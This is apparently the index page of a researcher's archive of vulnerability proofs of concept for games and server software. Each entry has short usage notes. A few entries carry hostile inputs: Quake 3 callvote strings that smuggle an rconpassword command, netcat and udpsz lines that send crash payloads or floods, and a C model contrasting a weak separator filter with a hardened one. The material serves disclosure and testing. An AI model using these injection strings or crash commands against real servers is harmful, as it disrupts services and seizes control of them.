Archive of my demonstration code (proof-of-concept), in line with my full-disclosure philosophy and directly related to my advisories section, where some other PoCs not available here are also located, together with all the technical details, examples and possible exceptions for testing these vulnerabilities.
read here if you don't know how to use my stuff, and for tips on recompiling it
The executables in the ZIP downloads are protected by password: aluigi
- Call of Duty Modern Warfare 3 <= 1.9.453 Steam SendP2PPacket NULL pointer 0.1 (codmw3null)
Proof-of-concept for the vulnerability disclosed in November 2012 at the Power of Community conference in Seoul.
The issue no longer exists in the current 1.9.388110; it was probably fixed in the game or in Steamworks many years ago.
REVULN paper: Owning Multiplayer Online Games
REVULN video: vimeo.com/440375446
- How to test the Samsung SmartTV DLNA vulnerability found in 2012 (samdlna)
REVULN slides: SmartTV Insecurity
- How to test the Samsung SmartTV DMRND vulnerability found in 2012 (samdmrn)
REVULN slides: SmartTV Insecurity
- Mental Ray Satellite <= 3.11.1.10 buffer-overflow (raysat_bof)
REVULN slides: Owning render farms
-
Proof-of-concept code for REVULN paper: Game Engines: A 0-Day's Tale
- Quake 4 getInfo stack-based overflow (quake4_1)
- Homefront multiple vulnerabilities (homefront_1)
- Sanctum and The Haunted: Hells Reach OutOfMemory/memset (sanctum_haunted_outofmemory)
- CryEngine 3 multiple vulnerabilities 0.1 (tested May 2013) (cryengine3_1)
- Brink <= 1.0.23692.48133 multiple vulnerabilities 0.1 (brink_1)
- Breach <= 1.1.0.-1 multiple vulnerabilities 0.1 (breach_1)
- Monday Night Combat array overflow (mnc_1)
- Steam Client Service IPC sender PoC 0.1 (steam_service_poc)
REVULN research: Steam Service Security
- Steam voip multiple vulnerabilities 0.1 (steamclient.dll 2.25.32.45) (steamute)
REVULN research: Steam Voip Security
- xArrow <= 3.2 multiple vulnerabilities 0.1 (xarrow_1)
- Vulnerabilities in Novell GroupWise Messenger <= 2.1.0 (nmma_x)
- Serv-U FTP <= 11.1.0.3 possible management console access 0.1 (servu_1b)
- Siemens Automation License Manager <= 500.0.122.1 vulnerabilities 0.1 (almsrvx_1)
- VisualTrader OpenVT lame Denial of Service (openvt_dos)
- proof-of-concept for MetaStock 11 (metastock_1)
- proof-of-concept for the vulnerabilities in eSignal 10.6.2425 (esignal_1)
- Winamp <= 5.61 in_midi multiple vulnerabilities (winamp_3)
- Winamp <= 5.61 multiple vulnerabilities (winamp_2)
- Quest NetVault SmartDisk <= 1.2.1 integer overflow 0.1 (percolator_1)
- proof-of-concept for the stack overflow in Microsoft HTML Help 6.1 (chm_1)
- GenBroker <= 9.21.201.01 multiple integer overflows 0.1 (genesis_iof)
- GenBroker <= 9.21.201.01 multiple memory free vulnerabilities 0.1 (genesis_1)
- FactoryLink <= 8.0.1.1473 multiple vulnerabilities 0.1 (factorylink_x)
- UniData unirpcd.exe <= 7.2.7.3806 vulnerabilities 0.1 (unirpcd_1)
- solidDB <= 6.5.0.3 Denial of Service 0.1 (soliddb_1)
- Winamp <= 5.5.8.2985 multiple buffer-overflows (winamp_1)
- F.E.A.R <= 1.08 and Project Origin <= 1.05 memory corruption 0.1 (fearless)
- Freeciv <= 2.2.1 Denials of Service 0.1 (freecivet)
- Qt <= 4.6.3 QSslSocket endless loop 0.1 (qtsslame)
- Mumble server <= 1.2.3 SQLite error 0.1 (mumbleed)
- America's Army 3 <= 3.0.7 vulnerabilities 0.1 (aa3again)
- id Tech 4 engine client array overflow (idtech4carray)
- Enemy Territory Quake Wars <= 1.5 invalid URL buffer-overflow 0.1a (etqwcbof)
- Chrome Engine 4 Denial of Service 0.1 (chromerda)
- TeamSpeak 3 <= 3.0.0-beta23 multiple vulnerabilities 0.1 (teamspeakrack)
- Battlefield 2 (1.41 - 1.1.2965-797) / 2142 (1.50 - 1.10.48.0) endless loop 0.2 (bf2loop)
proof-of-concept I wrote (and fixed) one year ago based on the vulnerability found by Francis Lavoie-Renaud (info here)
the same proof-of-concept also tests the bf2null vulnerability affecting the versions of the games patched versus bf2loop
- GEM engines multiple vulnerabilities 0.1 (gembugs)
- Torque game engine invalid memory access 0.1a (torqueer)
- Alien vs Predator <= 2.22 multiple vulnerabilities 0.1.1a (avp3dos)
- Star Trek DAC DoS (stduck)
nc SERVER 2000 -u < stduck.dat
- X-Motor <= 1.26 buffer-overflow and exceptions 0.1 (xmotorbof)
- NetKar <= 1.1 (1.0.3) buffer-overflow and NULL pointer 0.1 (netkarbof)
- Ventrilo <= 3.0.5 voice packet memset overflow 0.1 (ventrilomemset)
- Ventrilo <= 3.0.5 Speex packet access violation 0.1 (ventspeex)
- Source engine (build 3933) fragments memory corruption (sudppipe/proxocket plugin) 0.2 (sourcefraghof)
- Source engine (build 3698) fragments memory corruption (LAN test) 0.1 (sourcefraghoflan)
- Source engine (build 3933) file uploading vulnerabilities (sudppipe/proxocket plugin) 0.2 (sourceupfile)
- Source engine (build 3698) file uploading vulnerabilities (LAN test) 0.1 (sourceupfilelan)
- Source engine (build 3933) NULL pointer with SourceTV disabled (sudppipe/proxocket plugin) 0.2 (sourcenotvnull)
- Source engine (build 3933) format string (sudppipe/proxocket plugin) 0.2a (sourcefs)
- Source engine (build 3698) format string (LAN test) 0.1.1 (sourcefslan)
- Sniper Elite <= 1.0 multiple NULL pointers 0.1 (snipernull)
- Source engine (build 3939) entity NULL pointer 0.2c (sourcenullentity)
proof-of-concept for a NULL pointer in the latest version of the Source engine (tested build 3939), reported by Nowayz and the Garry's Mod community.
the bug is triggered by sending some commands before joining the match: npc_speakall, npc_ammo_deplete, npc_heal, npc_thinknow, physics_debug_entity, physics_select, wc_update_entity.
other details of the bug are explained in this discussion.
- Vietcong 2 <= 1.10 format string 0.1 (vietcong2fs)
- PunkBuster <= 9 Aug 2009 in-game messages Denial of Service 0.1 (pbmsgsdos2)
- PunkBuster for Soldier of Fortune II <= 1.728 buffer-overflow 0.1 (sof2pbbof)
- TrackMania Forever <= 2.11.19 clients NULL pointer 0.1 (tmnullever)
- TrackMania Forever <= v2009-08-01 unbannable clients and bell bug 0.1 (tmbellban)
- TrackMania Forever <= v2009-05-25 multiple vulnerabilities 0.1a (tm4never)
- S.T.A.L.K.E.R. Clear Sky <= 1.5.10 buffer-overflow 0.1 (stalkerbof)
- S.T.A.L.K.E.R. Clear Sky <= 1.5.10 malloc exception 0.1 (stalkazz)
- S.T.A.L.K.E.R. Clear Sky <= 1.5.10 unhandled exception 0.1 (dirtysky)
- Crysis <= 1.21 and Crysis Wars/Warhead <= 1.5 format string 0.1 (crysisfs)
- ArmA <= 1.14 and ArmA 2 <= 1.02 VON negative memcpy 0.1 (armadioz)
- ArmA <= 1.14 and ArmA 2 <= 1.02 format string 0.1b (armazzofs)
- ArmA <= 1.14 and ArmA 2 <= 1.02 memory bug 0.1b (armazzo)
- World in Conflict <= 1.0.1.1 wrong type assert 0.1 (wicass2)
- America's Army 3 <= 3.0.5 negative memset overflow 0.1 (aa3memset)
- America's Army 3 <= 3.0.5 query NULL pointer and access violation 0.1a (aa3pwood)
- TeamViewer host <= 4.0.5543 resources consumption 0.1 (teamvieweird)
notes: the server must have the "Accept KeepAlive sessions" option enabled (it's automatically activated if "Enable DirectIn Performance optimization" is selected); note also that the default TCP port seems to be 5938 and not 5939.
- Quake 3 engine Cbuf_Execute commands execution universal proof-of-concept 0.1 (q3cbufexec)
universal patcher which takes the original client executable of a game based on the Quake 3 engine and generates a modified one that converts the ';' chars in the commands sent by the client into carriage-returns, for testing a vulnerability which allows the execution of server-side game commands through a malformed callvote.
details of the vulnerability are available here and here.
examples of malformed callvote commands to use from the console of the modified game executable:
/callvote map "none;rconpassword empty"
/callvote timelimit "123;rconpassword none"
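Added example, not code from this archive nor from id Software: a cut-down model of why turning ';' into a carriage-return gets a second command past the callvote filter. The splitting rule mirrors what Quake 3's Cbuf_Execute does (';' ends a command only outside double quotes, while '\n' and '\r' always end it); the two filter functions are simplified stand-ins for the vote-string check in the game module, written here for illustration and not copied from it.

```c
/*
 * Model of the Quake 3 command buffer split and of a ';'-only vote filter
 * versus one that also rejects line breaks.  Added example: the splitting
 * follows Cbuf_Execute's rules, the filters are simplified stand-ins.
 */
#include <stdio.h>
#include <string.h>

#define MAX_CMDS 8
#define MAX_LINE 256

static char last_cmds[MAX_CMDS][MAX_LINE];

/* Split text into commands the way Cbuf_Execute does; returns the count. */
static int cbuf_split(const char *text, char out[MAX_CMDS][MAX_LINE])
{
    size_t len = strlen(text), start = 0;
    int n = 0;

    while (start < len && n < MAX_CMDS) {
        int quotes = 0;
        size_t i, cmdlen;

        for (i = start; i < len; i++) {
            if (text[i] == '"')
                quotes++;
            if (!(quotes & 1) && text[i] == ';')
                break;                      /* ';' splits only outside quotes */
            if (text[i] == '\n' || text[i] == '\r')
                break;                      /* line breaks split regardless */
        }
        cmdlen = i - start;
        if (cmdlen >= MAX_LINE)
            cmdlen = MAX_LINE - 1;
        memcpy(out[n], text + start, cmdlen);
        out[n][cmdlen] = '\0';
        n++;
        start = i + 1;
    }
    return n;
}

/* Weak check: the vote string is rejected only if it contains ';'. */
static int vote_arg_ok_weak(const char *arg)
{
    return strchr(arg, ';') == NULL;
}

/* Hardened check: reject every separator the command buffer honours. */
static int vote_arg_ok(const char *arg)
{
    return strpbrk(arg, ";\r\n") == NULL;
}

/* What a passed "callvote map <arg>" becomes once the server executes it. */
static int vote_commands(const char *arg)
{
    char buf[MAX_LINE];

    snprintf(buf, sizeof buf, "map %s\n", arg);
    return cbuf_split(buf, last_cmds);
}

static const char *vote_command(int idx)
{
    return last_cmds[idx];
}

int main(void)
{
    /* the page's example with ';', and the same string after the patcher
       has replaced ';' with '\r' on the wire */
    const char *semi = "none;rconpassword empty";
    const char *cr   = "none\rrconpassword empty";
    int i, n;

    printf("';' version : weak filter %s, hardened %s\n",
           vote_arg_ok_weak(semi) ? "accepts" : "rejects",
           vote_arg_ok(semi) ? "accepts" : "rejects");
    printf("'\\r' version: weak filter %s, hardened %s\n",
           vote_arg_ok_weak(cr) ? "accepts" : "rejects",
           vote_arg_ok(cr) ? "accepts" : "rejects");

    n = vote_commands(cr);
    for (i = 0; i < n; i++)
        printf("executed[%d]: %s\n", i, vote_command(i));
    return 0;
}
```

The weak filter lets the '\r' variant through and the command buffer then runs "map none" followed by "rconpassword empty" as two separate commands, which is the whole trick; a filter that rejects the same separators the buffer splits on (as later ioquake3 releases do) closes it.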
- q3unban plugin for proxocket 0.1 (q3unban_proxocket)
read the q3unban_proxocket.txt file inside the package.
- Unreal engine basic client and Fake Players DoS (unrealfp)
this is a fake players PoC which can be used to test various vulnerabilities in the Unreal engine or in some specific games which use it
- Server termination in Unreal engine 3 0.1.1 (ut3sticle)
Unreal Tournament 3 <= 1.3, Frontlines: Fuel of War <= 1.1.1, America's Army 3 <= 3.0.5 and others
- Clients format strings in the Unreal engine (unrealcfs)
- Ventrilo <= 3.0.2 NULL pointer 0.1 (ventrilobotomy)
- Skulltag <= 0.97d2-RC3 NULL pointer 0.1 (skulltagod)
- Halo <= 1.0.7.615 (before 30 Jul 2008) endless loop 0.1 (haloloop3)
- Halo <= 1.07.615 (before 30 Jul 2008) resources consumption 0.1 (halonso)
- America's Army <= 2.8.3.1 server termination 0.1 (armynchia)
- Unreal Tournament 3 <= 1.2/1.3beta4 memory corruption and NULL pointer 0.1a (ut3mendo)
works also with America's Army 3.0.5.
- Unreal Tournament 2004 <= v3369 NULL pointer 0.1.1 (ut2004null)
- Denial of Service in Warpath and Pariah through DISABLESPLIT (warpariahdos)
- ZDaemon <= 1.08.07 NULL pointer 0.1 (zdaemonull)
- Format string bug in the old versions of the Unreal engine (unrfs)
- Hell bell bug in the Unreal engine through the BADBOY command (unrhellbell)
- Two server bugs in old versions of the Unreal engine (unroldcrash)
- Soldner <= 33724 endless loop 0.1 (usurdat)
- Halo <= 1.07 endless loop 0.1.1a (haloloop2)
- S.T.A.L.K.E.R. <= 1.0006 multiple vulnerabilities 0.1 (stalker39x)
- Some bugs in SunAge <= 1.08.1 0.1 (sunagex)
- Double Denial of Service in Call of Duty 4 1.7 (cod4vamap)
- World in Conflict <= 1.008 NULL pointer 0.1 (wicboom)
- Skulltag <= v0.97D2-RC2 packet parsing DoS (skulltagloop)
- S.T.A.L.K.E.R. <= 1.0006 Denial of Service 0.1 (stalkerboom)
- Crysis <= 1.21 network logs disclosure 0.1 (crysislog)
- Call of Duty 4 <= 1.5 stats in-game Denial of Service 0.1 (sudppipe) (cod4statz_sudp)
requires the sudppipe proxy to work:
sudppipe -l cod4statz_sudp.dll SERVER PORT 20000
then from the CoD4 client type: connect 127.0.0.1:20000
- Call of Duty 4 <= 1.5 stats in-game Denial of Service 0.1 (cod4statz)
stand-alone proof-of-concept, works in LAN and versus servers which don't require authorization
- eTrust Secure Content Manager (eCSqdmn) <= 8.0.28000.511 Denial of Service 0.1 (ecsqdamn)
- CA ARCserve Backup <= 12.0.5454.0 invalid memory access 0.1 (carcbackazz)
- HP LoadRunner <= 9.10 Web Tours upload directory traversal 0.1a (willycoyote)
- HP OpenView Network Node Manager <= 7.53 memory corruption 0.1.1 (closedview)
- solidDB <= 06.00.1018 multiple vulnerabilities 0.1 (soliduro)
- LANDesk Classroom Manager / LanSchool <= 7.0.3.5 fun and bugs 0.1.1 (classdoom)
the students have full control over the other students' PCs (everything the teacher can do, though this PoC doesn't implement all of it) and can disable and crash the program too
- xine-lib <= 1.1.11 multiple heap overflows 0.1 (xinehof)
- McAfee Framework <= 3.6.0.569 (ePolicy Orchestrator 4.0) format string 0.1 (meccaffi)
- Timbuktu Pro <= 8.6.5 [RC 229] vulnerabilities 0.1 (timbuto)
- MailEnable Professional/Enterprise <= 3.1.3 IMAP multiple vulnerabilities 0.1 (maildisable)
- Perforce Server <= 2007.3/143793 multiple vulnerabilities 0.1 (perforces)
- Versant server <= 7.0.1.3 arbitrary commands execution 0.1 (versantcmd)
- Borland VisiBroker Smart Agent <= 08.00.00.C1.03 heap overflow 0.1 (visibroken)
- Borland StarTeam MPX <= 6.7 deserialization vulnerabilities 0.1 (starteammpx)
- Borland StarTeam <= 10.0.0.57 multiple post-auth integer overflows 0.1 (starteamz)
- Small Denial of Service in MobiLink Listener <= 10.0.1.3629 (dblsndos)
- Buffer-overflow in the passwords handling of Trend Micro OfficeScan 8.0 (officescaz)
- SurgeMail <= 38k4 multiple vulnerabilities 0.1 (surgemailz)
- SIDVault <= 2.0f "+" strstr Denial of Service 0.1 (sidfault)
- Double-Take <= 5.0.0.2865 multiple vulnerabilities 0.1 (doubletakedown)
- Zilab Remote Console Server <= 3.2.9 Denial of Service 0.1 (zilabzrcsdos)
- Zilab Chat and Instant Messaging <= 2.1 multiple vulnerabilities 0.1 (zilabzcsx)
- Sybase MobiLink <= 10.0.1.3629 heap overflow 0.1 (mobilinkhof)
- NowSMS <= v2007.06.27 multiple buffer-overflow 0.1 (nowsmsz)
- FreeSSHD <= 1.20 NULL pointer crash 0.1 (freesshdnull)
- WAC Server <= 2.0 Build 3503 double heap overflow 0.1 (wachof)
- ProSSHD <= 1.0 20070707 resources eater 0.1 (prosshddos)
after about 120 malformed connections the server no longer accepts new connections
- RPM Remote Print Manager <= 4.5.1.11 unicode buffer-overflow 0.1 (rpmlpdbof)
- Format string and crash in CyanSoftware print servers 0.1 (cyanuro)
- ExtremeZ-IP File and Printer Server <= 5.1.2x15 multiple vulnerabilities 0.1 (ezipirla)
- Ipswitch Instant Messaging <= 2.0.8.1 multiple vulnerabilities 0.1 (ipsimene)
- TinTin++ <= 1.97.9 chat vulnerabilities 0.1 (rintintin)
- Wincom LPD <= 3.0.2.623 multiple vulnerabilities 0.1 (wincomalpd)
- SAPlpd <= 6.28 multiple vulnerabilities 0.1 (saplpdz)
- BitTorrent <= 6.0.1 (build 7859) and uTorrent <= 1.7.6 (build 7859) webui crash 0.1 (ruttorrent2)
- BitTorrent <= 6.0 (build 5535) and uTorrent <= 1.7.5 (build 4602) Peers info GUI unicode overflow 0.1 (ruttorrent)
- Quicktime Player <= 7.3.1.70 HTTP error message buffer-overflow 0.1 (quicktimebof)
full proof-of-concept which can be turned into a code execution exploit simply by passing the offset, the return address and the shellcode you want
all the info is available at runtime
- Buffer-overflow in Quicktime Player 7.3.1.70 (quicktimebof)
the first and more basic proof-of-concept for testing this vulnerability:
nc -l -p 80 -v -v -n < quicktimebof.txt
QuickTimePlayer.exe rtsp://127.0.0.1/file.mp3
- SAP MaxDB <= 7.6.03.07 remote command execution 0.1.1 (sapone)
- xtacacsd <= 4.1.2 report() buffer-overflow 0.1 (xtacacsdz)
- mySQL <= 6.0.4 (yaSSL <= 1.7.5) pre-auth buffer-overflow 0.1 (mysqlo)
- yaSSL <= 1.7.5 multiple vulnerabilities 0.1 (yasslick)
- Georgia SoftWorks SSH2 Server <= 7.01.0003 multiple vulnerabilities 0.1 (gswsshit)
- Buffer-overflow and format string in White_Dune 0.29beta791 (whitedunboffs)
- Pragma FortressSSH <= 5.0.4.293 Denial of Service 0.1.1 (pragmassh)
- Pragma TelnetServer <= 7.0.4.589 Denial of Service 0.1 (pragmatel)
- Seattle Lab Telnet Server <= 4.1.1.3758 exception message 0.1 (slnetmsg)
- VanDyke VShell <= 3.0.3-569 exception message 0.2 (vshellmsg)
- Extended Module Player <= 2.5.1 buffer-overflow 0.1 (xmpbof)
- Multiple vulnerabilities in libnemesi 0.6.4-rc1 (libnemesibof)
- Multiple vulnerabilities in Feng 0.1.15 (fengulo)
- Unicode buffer-overflow in Zoom Player <= 6.00b2 (zoomprayer)
- Buffer-overflow and format string in VideoLAN VLC 0.8.6d (vlcboffs)
- WinUAE <= 1.4.4 gunzip buffer-overflow 0.1 (winuaebof)
- id3lib (devel CVS) array overflow 0.1 (id3libexec)
- Pro-Wizard <= 1.62 multiple buffer-overflow 0.1 (prowizbof)
- PeerCast <= 0.1217 heap-overflow 0.1 (peercasthof)
- DOSBox <= 0.72 filesystem access 0.1 (dosboxxx)
- Easy File Sharing 4.5 upload directory traversal 0.1a (efsup)
- Multiple vulnerabilities in Firefly Media Server (mt-daapd) 2.4.1 / SVN 1699 (fireflyz)
some files to send with netcat for testing the vulnerabilities
- I Hear U <= 0.5.6 Denial of Service 0.1 (ihudos)
- Rigs of Rods <= 0.33d global dbuffer buffer-overflow 0.1 (rorbof)
- LIVE555 Media Server <= 2007.11.01 parseRTSPRequestString DoS 0.1 (live555x)
- q3unban plugin for sudppipe 0.1.2 (q3unban_sudp)
plugin for my Simple UDP proxy/pipe:
sudppipe -l q3unban_sudp.dll IP PORT 1234
then from the console of the game type: connect 127.0.0.1:1234
- World in Conflict <= 1.001 "assert" denial of service 0.1 (wicassert)
- Banned clients can join the servers which use the Quake 3 engine 0.1 (q3unban)
NOTE: this PoC is experimental since it is not the best way of testing the bug
if you use the cl_anonymous method remember to set it back to the default (0) when you finish
- q3cfilevar proof-of-concept for Quake 3 1.32c Windows 0.1 (q3cfilevar_132c)
copy the content of the zip into the Quake 3 folder, launch the q3cfilevar_132c.lpatch file with Lpatch and follow the information on the screen
- q3cbof proof-of-concept for Quake 3 1.32c Windows 0.1 (q3cbof_132c)
- q3cbof proof-of-concept for Quake 3 1.32 Windows 0.1 (q3cbof_132)
- Live for Speed demo/S1/S2 <= 0.5X10 clients buffer-overflow 0.1 (lfscbof)
- Dropteam <= 1.3.3 multiple vulnerabilities 0.1 (dropteamz)
- Doom 3 engine format string exploitation through Punkbuster 0.1 (d3engfspb)
Doom 3 <= 1.3.1, Quake 4 <= 1.4.2 and Prey <= 1.3
- F.E.A.R. <= 1.08 format string exploitation through Punkbuster 0.1 (fearfspb)
- America's Army <= 2.8.2 unexploitable buffer-overflow through Punkbuster 0.1 (aaboompb)
- gMotor2 engine multiple vulnerabilities 0.1 (gmotor2)
- OpenTTD <= 0.5.3-RC3 server termination 0.1 (openttdy)
this bug was found independently by me as a remote (in-game) exploitation, but it was fixed in revision 10566 about two months ago
- Mumble <= 1.0.0 clients crash/freeze 0.1 (mumblez)
the first bug was found and fixed by the same author in revision 700 (I found it independently), while the other one was found by me and is caused by the Qt library
- CellFactor Revolution <= 1.03 format string and buffer-overflow 0.1 (cellfucktor)
- Alien Arena 2007 <= 6.10 format string and clients disconnection 0.1.2 (aa2k7x)
- Savage <= build 2 oct 2006 bugs 0.1 (savagex)
- Doomsday <= 1.9.0-beta5.1 multiple vulnerabilities 0.1.1 (dumsdei)
- Skulltag <= 0.97d-beta4.1 heap overflow 0.1.1 (skulltaghof)
another way to test this bug should be through: udpsz -s -l 50 127.0.0.1 10666 8000
- Soldat <= 1.4.2/2.6.2 multiple DoS 0.1 (soldatdos)
- Asura engine (network SDK) in-game buffer-overflow 0.1 (asurabof)
works versus both Rogue Trooper and Prism: Guard Shield
- Unreal engine <= Aug 2007 web admin DoS 0.1 (unrwebdos)
- Toribash <= 2.71 multiple vulnerabilities 0.1 (toribashish)
- rFactor <= 1.250 multiple vulnerabilities 0.1 (rfactorx)
- Quake 3 engine directory traversal PoC 0.2.2 (q3dirtrav)
universal proof-of-concept for the bug found by Ludwig and Thilo over one year ago, which allows an external attacker to download server.cfg or any other file from a vulnerable server with sv_allowdownload enabled
- Live for Speed Fake Players DoS (lfsfp)
contains 4 options for testing the vulnerabilities I found in LFS 0.5X10
- Babo Violent 2 <= 2.08.00 multiple vulnerabilities 0.1 (bv2x)
- Zoidcom <= 0.6.7 crash 0.1 (zoidboom2)
- Half-Life fake players bug (no auth) (hlfill)
implements the hlfreeze/hl-headnut/csdos/Born_to_be_pig attacks
use "-p 1 -r steam" or "-p 4 -r valve" for Steam and Valve authenticated servers
- Half-Life engine remote server/client crash 0.2.1 (hlboom)
Steam before 07 July 2004 and any WON version
- Pulseaudio <= 0.9.5 (rev 1437) termination 0.1 (pulsex)
- Network Audio System <= 1.8a (svn 231) multiple vulnerabilities 0.1 (nasbugs)
- Netrek server <= 2.12.0 format string bug 0.1a (netrekfs)
- Marathon Aleph One <= 16 Dec 2006 remote server crash 0.1 (alephonz)
- Multiple buffer-overflows in libmusicbrainz <= 2.1.2 (brainzbof)
- Multiple buffer-overflows in AlsaPlayer <= 0.99.76 (alsapbof)
- OpenMPT <= 1.17.02.43 and SVN <= 157 stack and heap overflows 0.1 (mptho)
- Aqualung <= 0.9beta5 (CVS 0.193.2) vendor's tag buffer-overflow (aquabof.flac)
- Festalon 0.5.0-0.5.5 heap corruption 0.1 (festahc)
- DConnect Daemon <= 0.7.0 and CVS 30 Jul 2006 multiple vulnerabilities 0.1 (dconnx)
- Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 multiple vulnerabilities 0.1 (ocpbof)
- BomberClone <= 0.11.6 bugs 0.1 (bcloneboom)
- libmikmod <= 3.2.2 and current CVS heap overflow with GT2 files 0.1 (lmmgt2ho)
- Cheesetracker <= 0.9.9 possible code execution 0.1 (cheesebof)
- Dumb <= 0.9.3 (CVS 16 Jul 2006) heap overflow in it_read_envelope 0.1 (dumbit)
- Kaillera <= 0.86 possible code execution 0.1 (kailleraex)
- Proof-of-concept for the buffer-overflow in the WebTool service of Punkbuster for servers (minor than v1.229) (pbwebbof)
- NetPanzer <= 0.8 (rev 952) frameNum bug 0.1 (panza)
- Proof-of-concept builder for the ASF and QT heap overflow in libextractor <= 0.5.13 (rev 2832) (libextho)
- Outgun <= 1.0.3 (bot 2) multiple vulnerabilities 0.1 (outgunx)
- Empire <= 4.3.2 crash 0.1 (empiredos)
- Genecys <= 0.2 buffer-overflow and NULL pointer crash 0.1 (genecysbof)
- Raydium <= SVN 309 multiple vulnerabilities 0.1 (raydiumx)
- Skulltag <= 0.96f format string 0.1 (skulltagfs)
- OpenTTD <= 0.4.7 multiple vulnerabilities 0.1 (openttdx)
- dim3 <= 1.5 buffer-overflow bugs 0.1 (dim3bof)
- Ultr@VNC <= 1.0.1 *Log::ReallyPrint buffer-overflow 0.1 (uvncbof)
- Legacy Doom Fake Players DoS 0.1 (legacyfp)
this is a simple fake players tool, but it also causes the freezing of the players and the subsequent termination of server version 1.42
- Zdaemon <= 1.08.01 buffer-overflow in is_client_wad_ok 0.1 (zdaebof)
- Vavoom <= 1.19.1 multiple vulnerabilities 0.1 (vaboom)
- csDoom <= 0.7 multiple vulnerabilities 0.1 (csdoombof)
- ENet library <= Jul 2005 multiple vulnerabilities 0.1 (enetx)
- GGZ <= 0.0.12 clients disconnector 0.1 (ggzcdos)
- Globulation 2 Fake Players DoS (glob2fp)
this tool is also linked in this section because it crashes servers <= Alpha19 when there are too many players
- Ventrilo Fake Players DoS (ventrilofp)
this tool is also linked in this section because it contains some flooding attacks which have some small effects versus clients
- Alien Arena 2006 GE <= 5.00 multiple vulnerabilities 0.1 (aa2k6x)
- Freeciv <= 2.0.7 jumbo malloc crash 0.1 (freecivdos)
- LieroX <= 0.62b multiple vulnerabilities 0.1 (lieroxxx)
- Sauerbraten <= 2006_02_28 multiple vulnerabilities 0.1 (sauerburn)
- Cube <= 2005_08_29 multiple vulnerabilities 0.1 (evilcube)
- Monopd <= 0.9.3 DoS 0.1 (monopdx)
- CrossFire <= 1.8.0 oldsocketmode buffer-overflow 0.1 (crossfirebof)
I found this bug independently in the current available version, but it was already patched by the developers in the CVS and later in the 1.9.0 release
- Dual DHCP DNS Server 1.0 buffer-overflow 0.1 (dualsbof)
- BZFlag <= 2.0.4 (2.x) server crash 0.1 (bzflagboom)
- GO-Global for Windows server <= 3.1.0.3270 buffer-overflow 0.1 (ggwbof)
- GO-Global for Windows clients <= 3.1.0.3270 buffer-overflow 0.1 (ggwbofc)
- ASUS Video Security <= 3.5.0.0 HTTP multiple vulnerabilities 0.1 (asusvsbugs)
- Scorched 3D <= 39.1 (bf) multiple vulnerabilities 0.1a (scorchbugs)
- Glider collect'n kill <= 1.0.0.0 buffer-overflow 0.1 (gliderbof)
- FlatFrag <= 0.3 multiple vulnerabilities 0.1 (flatfragz)
- Blitzkrieg 2 <= 1.21 players kicker 0.1 (blitz2out)
- Battle Carry <= .005 socket termination 0.1 (bcarrydos)
- Virtools <= 3.0.0.100 buffer-overflow and directory traversal bugs 0.1 (virtbugs)
- MultiTheftAuto <= 0.5 patch 1 server crash/motd reset 0.1 (mtaboom)
- Universal "Gamespy cd-key in use" executable-2-PoC converter 0.1 (gskeyinuseuni)
modifies 3 bytes of the executable of any game that uses the Gamespy cd-key SDK, converting it into a proof-of-concept which keeps in use all the cd-keys of the gamers who join the server
read the text file inside
- BFCommand & Control login bypass 0.1 (bfccown)
BFCC <= 1.22_A and BFVCC <= 2.14_B
- Ventrilo <= 2.3.0 server crash 0.1 (ventboom)
- Chris Moneymaker's World Poker Championship 1.0 buffer-overflow 0.1 (chmpokbof)
- Netpanzer <= 0.8 endless loop 0.1 (panzone)
- Raknet library <= 2.33 (before 30 May 2005) server termination 0.1 (rakzero)
an example of vulnerable game is Elite Warriors: Vietnam <= 1.03
- Stronghold 2 <= 1.2 server crash 0.1 (strong2boom)
- Terminator 3 War of the Machines <= 1.16 buffer-overflow and crash 0.2.1 (t3wmbof)
- C'Nedra <= 0.4.0 buffer-overflow 0.1 (cnedrabof)
- Halo <= 1.06 endless loop 0.1.1a (haloloop)
- Warrior Kings Battles <= 1.23 format string and crash bugs 0.1 (wkbbugs)
- Warrior Kings <= 1.3 format string bug 0.1 (warkingsfs)
- War Times <= 1.03 in-game server crash 0.1 (wartimesboom)
- Zoidcom <= 1.0 beta 4 crash 0.1 (zoidboom)
- Gamespy cd-key validation: "Cd-key in use" DoS 0.2 (gskeyinuse)
- Gamespy cd-key validation: cd-key never in use 0.1.1a (gskeydisc)
for both *nix and Windows. An OS which supports raw sockets is required, and you must verify that the spoofed packets really reach the target host (root privileges, no firewalls and no other OS limitations)
- Mtp-Target <= 1.2.2 clients format string and server crash 0.1 (mtpbugs)
- IGI 2: Covert Strike <= 1.3 Gamespy cd-key SDK buffer-overflow 0.1 (igi2gsbof)
- IGI 2: Covert Strike <= 1.3 in-game vulnerabilities 0.1 (igi2bugs)
- Yager <= 5.24 multiple vulnerabilities 0.1a (yagerbof)
- Jedi Academy <= 1.011 in-game server buffer-overflow 0.1 (jamsgbof)
script to launch with "/exec jamsgbof" from the client console
- Call of Duty <= 1.5b, United Offensive <= 1.51b and Call of Duty 2 Windows server crash 0.1 (codmsgboom)
script to launch with "/exec codmsgboom" from the client console
- Quake 3 engine in-game players kicking 0.1 (q3msgboom)
script to launch with "/exec q3msgboom" from the client console
- Tincat network library Release 2 < build 28: buffer-overflow 0.1 (tincat2bof)
works versus The Settlers: Heritage of Kings <= 1.02, Sacred <= 1.8.2.6 and others
- FunLabs games multiple Denial of Service 0.1 (funlabsboom)
- Xpand Rally <= 1.1.0.0 in-game format string bug 0.1 (xprallyfs)
- Chaser Fake Players DoS and clients disconnector (chaserfp)
- Carsten's 3D Engine <= March 2004 format string and crash 0.1 (ca3dex)
- Scrapland <= 1.0 server termination 0.1 (scrapboom)
- Soldier of Fortune 2 (1.02, 1.03) cl_guid server crash 0.2 (sof2guidboom)
- TrackerCam <= 5.12 multiple vulnerabilities 0.1 (tcambof)
- Bontago <= 1.1 server buffer-overflow 0.1 (bontagobof)
- Quake 3 engine infostring crash/shutdown scanner 0.1.2 (q3infoboom)
- Armagetron / Armagetron Advanced <= 0.2.7.0 server crash 0.1 (atronboom)
- Armagetron / Armagetron Advanced Fake Player DoS (atronfp)
a fake players tool able to freeze both the server and the connected clients of versions <= 0.2.7.0
- Integer overflow in RealArcade 1.2.0.994
- Arbitrary files deletion in RealArcade 1.2.0.994
- Painkiller <= 1.35 in-game cd-key alpha-numeric buffer-overflow 0.1 (painkkeybof)
- Xpand Rally <= 1.0.0.0 server/clients crash 0.1 (xprallyboom)
- Local buffer-overflow in W32Dasm 8.93 (w32dasmbof.disasm_me)
